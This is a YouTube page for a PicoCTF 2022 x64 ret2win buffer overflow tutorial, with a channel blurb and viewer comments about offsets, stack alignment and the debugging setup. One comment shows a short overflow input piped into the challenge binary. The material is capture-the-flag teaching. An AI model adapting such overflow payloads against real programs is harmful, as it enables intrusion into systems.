x64 ret2win - LINUX Buffer Overflow (PicoCTF 2022 #41 'x-sixty-what')
Рет қаралды 24,606
2 жыл бұрынHelp the channel grow with a Like, Comment, & Subscribe!
❤️ Support ➡ j-h.io/patreon ↔ j-h.io/paypal ↔ j-h.io/buymeacoffee
Check out the affiliates below for more free or discounted learning!
🖥️ Zero-Point Security ➡ Certified Red Team Operator j-h.io/crto
💻Zero-Point Security ➡ C2 Development with C# j-h.io/c2dev
👨🏻💻7aSecurity ➡ Hacking Courses & Pentesting j-h.io/7asecurity
📗Humble Bundle ➡ j-h.io/humblebundle
🐶Snyk ➡ j-h.io/snyk
🌎Follow me! ➡ j-h.io/discord ↔ j-h.io/twitter ↔ j-h.io/linkedin ↔ j-h.io/instagram ↔ j-h.io/tiktok
📧Contact me! (I may be very slow to respond or completely unable to)
🤝Sponsorship Inquiries ➡ j-h.io/sponsorship
🚩 CTF Hosting Requests ➡ j-h.io/ctf
🎤 Speaking Requests ➡ j-h.io/speaking
💥 Malware Submission ➡ j-h.io/malware
❓ Everything Else ➡ j-h.io/etc
@MrToast72 Жыл бұрын
"Don't forget guys, don't blindly trust any old code on the internet. That being said, I'm going to blindly trust this code on the internet." I had a real good laugh at this, thank you for your great humor John!
@TheH2OWeb 2 жыл бұрын
You're really good at explaining how this works ! Thank you John for sharing your knowledge !
@HAGSLAB 2 жыл бұрын
I have watched all your earlier binary exploitation videos and this video definitely adds a bit more context and knowledge that I was missing when it comes to x64 and the IP differences. The canonical address stuff makes sense now. Thank you :) I also love that you effed up with the print statement, I do similar stupid stuff all the time 🤦🏻♂️😆
@viv_2489 2 жыл бұрын
This is brilliant and very clear explanation...thanks for sharing
@AntonioSouza 2 жыл бұрын
I love yours vídeos. Made me understand 64 bit still more.
@DaniSpeh 2 жыл бұрын
Very nice. Made me understand 64 bit a lot better
@nuridincersaygili 2 жыл бұрын
This is pure gold... thx so much!
@thedailysenior Жыл бұрын
Thank you John!!
@lordspacecake5565 2 жыл бұрын
Very great information!!!
@maesse Жыл бұрын
Thanks for these videos! My GDB crashed on printf, and googling the error revealed that the issue was that the flag string was not 16 byte aligned. Skipping the opcode "0x40123a push rbp" happens to keep the stack pointer aligned and that's why it worked 🤓
@parthghughriwala6799 2 жыл бұрын
Awesome!!!
@grover- 2 жыл бұрын
I'd have liked to see you use r2 for this ctf.
@joeborders Жыл бұрын
Jeff is the real MVP
@Ken-cj1in 2 жыл бұрын
Hey man!!
@herrpez 2 жыл бұрын
"A gimmick is a novel device or idea designed primarily to attract attention or increase appeal, often with little intrinsic value."
@mellowgeekstudio Жыл бұрын
Hardly anything to do with the meaning seemed to be intended in this video.
@herrpez Жыл бұрын
@@mellowgeekstudio Exactly.
@user-hd3pz2ow1b 3 ай бұрын
cool
@beebakrizzle 2 жыл бұрын
Very cool! I was struggling with this one and the video was very clearly explained. Quick question: what do you use to run Kali in a VM? My VirtualBox instance is very slow and I have a super beefy computer (32GB RAM, i7 CPU, RTX3080 graphics). I enabled 3D acceleration and put half of the resources available for the box (16GB memory, 8 cpus, max video memory) but it's super slow. Virtualization is enabled in bios. PS: I prefer to use `echo -e "AAAA...\x3b\x12\x40"` for piping input into the binary, I think the python makes it confusing.
@__someone__3141 2 жыл бұрын
maybe ur using hdd instead of SSD? it's a very huge difference make sure to put the VM files on SSD
@lfcbpro Жыл бұрын
I have no idea if this is something that might be significant, I am new to all this, but what I did notice was that my VirtualBox instance ran a lot slower than my VMware instance, I don't know if it is worth a try changing to the VMware?
@jraymundotunortiz9138 2 жыл бұрын
I saw that the buffer overflow 3 has less than 500 solves, I hope we can get a video about it
@rimantasri4578 Жыл бұрын
Hello, I did exactly the same as it was done in this video, but my attack failed and I don't know why. The only difference between my attack and Hammond's was the flag function's address. In this video it was 0x0000000000401236. Mine was 0x0000000000001191. When I enter an overflow string into my program, it gets a segmentation fault, but the flag function is not called. When I check the changed RIP, it is something different than I have actually inputted, it is something like 0x555555bf-something, but I didn't put these numbers anywhere. Am I missing something?
@taylor8294 2 жыл бұрын
32:05 ColdFusion's post says "Examining RSP... so RIP is at offset 120" and John does the same. Why does matching the pattern at RSP give us the offset for RIP? Is it because RSP comes immediately after RIP in memory, and because its a non-canonical address RIP "gets skipped"? If so, is RSP always immediately after RIP in memory? Thanks
@rabiaawasmi1554 2 жыл бұрын
When you hit the leave instruction the rsp will point on the return address the same that will be poped into the rip
@rabiaawasmi1554 2 жыл бұрын
Also ret seems to not pop that adress if its not canonical
@taylor8294 2 жыл бұрын
@@rabiaawasmi1554 I see, thank you!
@mellowgeekstudio Жыл бұрын
Video did a terrible job at making that clear.
@AmanPatel-rv2it 2 жыл бұрын
This one is the longest one
@AwesomeLazyNinja 11 ай бұрын
We need a "gimmick" counter 😂
@samthelamb0718 7 ай бұрын
and a "press the i believe button" counter 😂
@shivasijwali6779 2 жыл бұрын
Can someone please explain me what is
@drewzilla1263 2 жыл бұрын
makes it fill the bytes to be the size of QWORD (8 bytes)
@bhagyalakshmi1053 11 ай бұрын
R15?
@mauricekyalo9101 2 жыл бұрын
Yt algo things 👍
@bhagyalakshmi1053 Жыл бұрын
Gdb ? Pro? Structured data in structured data
@georgehammond867 2 жыл бұрын
How long are you in this business ....6 years or more?
@bhagyalakshmi1053 Жыл бұрын
What this metta spa
@bhagyalakshmi1053 11 ай бұрын
Rax,rcx, explain
@dom1310df 2 жыл бұрын
Given GEF is written in Python, why isn't it just pip installable?
@drewzilla1263 2 жыл бұрын
pip is for adding code packages to your python development environment
@xerrion Жыл бұрын
@@drewzilla1263 no, if I for example use pip install black I can use black globally and not just in my development environment
@Sqwince23 2 жыл бұрын
It's GIF not GIF...
John Hammond
Рет қаралды 43 М.
John Hammond
Рет қаралды 25 М.